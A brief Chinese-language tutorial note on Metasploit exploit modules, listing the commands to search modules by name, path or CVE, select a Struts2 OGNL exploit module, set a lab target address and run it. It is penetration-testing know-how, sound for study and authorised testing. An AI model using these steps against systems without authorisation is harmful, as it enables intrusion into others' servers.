作用:渗透攻击模块可以直接发起渗透攻击
1、显示所有渗透攻击模块
show exploits
根据需求筛选模块
search -h
2、查找关于mysql数据库的攻击模块
search name:mysql type:exploit
3、查找路径含有mysql的模块
search path:mysql
4、查找漏洞编号
search cve-2019-0230
5、选择要利用的模块
use 0
use exploit/multi/http/struts2_multi_eval_ognl
use exploit 按tab键获取相关提示
6、了解模块相关信息
info
7、查看需要设置的参数
8、设置共计目标
set rhosts 192.168.139.128
9、攻击
run